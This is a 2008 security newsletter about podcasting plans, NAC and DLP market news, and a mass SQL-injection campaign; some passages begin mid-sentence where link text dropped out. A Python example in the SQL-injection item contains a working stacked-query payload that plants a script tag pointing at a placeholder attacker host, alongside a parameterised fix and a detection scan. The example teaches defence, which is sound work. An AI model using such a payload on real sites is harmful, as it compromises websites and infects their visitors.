January 10, 2008 - Volume 3, #4
Good Morning:
I've been very resistant to doing a podcast. I'm not exactly sure why,
but I guess it's because I don't really listen to any - so I can't
imagine anyone would listen to mine. Honestly, I find most podcasts to
be crappy. They are long, drawn out, and generally a waste of time. Not
all, but most. I also don't have the patience to sit and listen to an
hour of anything, besides music.
I've heard more than once
that audio would be a great venue for me. I've been told my voice and
speaking style are "unique," which I always figured meant crappy. I do
lots of webcasts and try to relay a passion for what I do and I try to
be entertaining and kind of wacky. I know how boring it is to
listen to streamed audio over your lunch break, so the least I can do
is try to make it fun. But do I want to do this a couple of times a
month? That's the real question.
There is precedent for this. I've been doing a podcast and feature
article for eBizQ (called the Mike
Rothman Security Report [1], if you haven't heard it) for a
couple of months and it's been fun. It's trivial to record the audio on
my Mac (Skype + AudioHijackPro = easy) and the sound quality has proven
to be pretty good.
So I'm going to give podcasting a try. The first Pragmatic CSO podcast
will appear tomorrow. It will be short (10 minutes max), sweet and
hopefully entertaining. I'll still do the P-CSO newsletter, but
probably a bit less frequently (maybe once a month now).
What's going to be the point of the P-CSO podcast? Basically, I want to
pull nuggets out of the book and expand on those a bit. I also want to
interview practitioners, analysts, auditors, and other security-related
folks on topics of interest. But most of all, I want to have fun and
learn some new stuff. By talking with smart folks and honing my audio
skills, I'll be able to do both.
That's it for today. Lots to do, including figuring out all these
podcast details.
Have a great weekend.
The Dutch Couple image originally uploaded by billbarber1 [2]
Technorati: Information Security [3], CSO [4], Security Mike [5], Internet Security [6]
[7] The Pragmatic CSO: Available Now! Read the Intro and Get "5 Tips to be a Better CSO" www.pragmaticcso.com [8]
[10] Get Your Special Report: 6 Easy Steps to Protect Your Identity and get access to Security Mike's Portal today www.securitymike.com [9]
Top Security News
Tech moves that matter - for good and bad. [11]
Good isn't very interesting to me, so lo and behold, the #1 bad move in
2007? NAC. That's pretty funny. But it's actually a Joel Snyder induced
rant about NAC standards. Cisco's refusal to play nice with the TCG is
evidently a stupid move. Uh, not so much. What's in it for Cisco to
play along? Why do customers care? What value is a common NAC standard
going to provide? It's not like you are going to buy NAC gear from
multiple vendors. Microsoft had to play nice with TCG; their NAP stuff
isn't ready and won't be ready for most of this year. So that was a
Barney relationship. There is no benefit to Cisco for getting on board.
They'll have agents for all the operating systems and why would they
support heterogeneity? Not when there is too much riding on Cisco
everywhere.
this one on DLP consolidation [13] and
the market impact. It's actually more of a deal book for all the big
security vendors out there that don't have a DLP capability yet. Every
start-up is represented, so Cara (the author) must have worked really
hard to find all of these random vendors to provide comment. But
besides that minor entertainment value, we need to keep in mind that
the pace of consolidation is inconsistent with the underlying ECONOMIC
fundamentals of the DLP market. The big vendors are no longer waiting
for a market to really emerge before buying real estate. Thus every new
innovative security feature is destined to be assimilated before the
market ever gets off the ground. I guess that's a pretty obvious
conclusion to draw, but it will have an impact. There is a real
liability to being an early adopter now, knowing that sooner - rather
than later - whatever you buy will be subsumed into a bigger entity and
most likely screwed up.
The Laundry List
- Just what we need, another pundit talking about what's going to happen in security management in 2008. Ho hum. Even when the analyst is me. - Rothman column on 2008 Security Management [15]
- These aren't 5 immutable laws or anything, but this month's eBizQ feature is a primer on virtualization security. - The Mike Rothman Security Report [16]
Top Blog Postings
http://thurston.halfcat.org/blog/2008/01/04/let-the-metrics-begin/ [17]
Litchfield did a while back [19]. Of
course, he didn't
leave anything malicious behind, but the concept is the same. The bad
guys build a script to find a bunch of SQL-injection vulnerable sites
(a scanner can do this, though it would need to be tuned a bit to not
raise a lot of suspicion), then they inject the malware and wait for
great stuff to happen. It's not necessarily self-propagating (like
SQL*Slammer), but it also shows that massive attacks are still quite
possible. What's a user to do? Run a scan against your Internet
accessible sites and make sure you are not vulnerable. Do pen tests
early and often. Also think about Firefox and NoScript, which would
protect client devices that navigate to these compromised websites.
http://www.terminal23.net/2008/01/mass_sql_injection.html [20]
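As an added illustration of the attack pattern described above, and of the check that goes with it, here is example code written for this newsletter (it is not from the linked post or from any of the sites that were hit): a lookup page that pastes its `id` parameter straight into SQL, the same lookup done with a validated, bound parameter, and a scan of the stored content for script tags that point off-site, which is how you find out whether the injected "malware" is already sitting in your database. SQLite stands in for the site's database, and the `articles` table, the trusted-host list and the `malware.invalid` hostname are all assumptions made for the example.

```python
import re
import sqlite3
from urllib.parse import urlparse

# Constructed sample content table (nothing here is from the original post).
ARTICLES = [
    ("Welcome", "<p>Hello, world.</p>"),
    ("Q4 results", '<p>Revenue was up.</p><script src="/js/site.js"></script>'),
]

# Hosts allowed to serve script into our pages (assumed; set it for your site).
TRUSTED_SCRIPT_HOSTS = {"www.example.com"}

# What a mass-injection script might send as the `id` parameter of a page
# such as article?id=1. It terminates the intended SELECT and stacks an
# UPDATE that tags every row with a script pointing at an attacker host.
# The hostname is a placeholder (.invalid TLD), not a real malware site.
PAYLOAD = (
    "1; UPDATE articles SET body = body || "
    "'<script src=\"http://malware.invalid/x.js\"></script>'; --"
)


def make_db():
    """In-memory SQLite stand-in for the site's content database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)"
    )
    conn.executemany("INSERT INTO articles (title, body) VALUES (?, ?)", ARTICLES)
    conn.commit()
    return conn


def lookup_vulnerable(conn, article_id):
    """The bug: the request parameter is pasted into the SQL text.

    executescript runs every statement in the string, standing in for
    database drivers that accept several statements per call; that is what
    turns a read-only lookup page into a write primitive. The SELECT's rows
    are not even needed: the attacker only cares about the stacked UPDATE.
    """
    sql = "SELECT title, body FROM articles WHERE id = " + article_id
    conn.executescript(sql)
    conn.commit()


def parse_id(value):
    """Return the integer id, or None when the parameter is not a plain integer."""
    return int(value) if value.isdigit() else None


def lookup_safe(conn, article_id):
    """The fix: validate the type, then bind the value instead of pasting it."""
    ident = parse_id(article_id)
    if ident is None:
        return []  # a real handler would answer HTTP 400 here
    return conn.execute(
        "SELECT title, body FROM articles WHERE id = ?", (ident,)
    ).fetchall()


SCRIPT_SRC = re.compile(r"""<script[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)


def find_injected_scripts(conn, trusted=TRUSTED_SCRIPT_HOSTS):
    """Scan stored content for script references to hosts we do not control.

    This is the check to run if you suspect you were already hit: the injected
    tag lives in the database, so it shows up in every page that renders the
    column. Relative paths (same origin) are treated as ours.
    """
    hits = []
    for row_id, body in conn.execute("SELECT id, body FROM articles ORDER BY id"):
        for src in SCRIPT_SRC.findall(body or ""):
            host = urlparse(src).hostname
            if host and host not in trusted:
                hits.append((row_id, src))
    return hits


if __name__ == "__main__":
    db = make_db()
    print("safe lookup:", lookup_safe(db, "1"))
    print("safe lookup with payload:", lookup_safe(db, PAYLOAD))
    lookup_vulnerable(db, PAYLOAD)
    print("rows now carrying foreign script:", find_injected_scripts(db))
```

Run it and the safe lookup returns the article for `id=1` and nothing for the payload, while one call to the vulnerable lookup with the payload leaves every row carrying a script reference to the attacker's host. The content scan is the cheap "have we been hit" test the post is asking for; the scanner and pen test it recommends are what keep you from needing it.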
http://blogs.ittoolbox.com/security/adventures/archives/anatomy-of-a-physical-security-breach-21650 [22]
http://sm-blog.securitymike.com [24]
Check out the latest on the Security Incite blog: http://blog.securityincite.com/ [25]
Read the most recent Daily Incite: http://securityincite.com/security-incite-rants/daily-incite [26]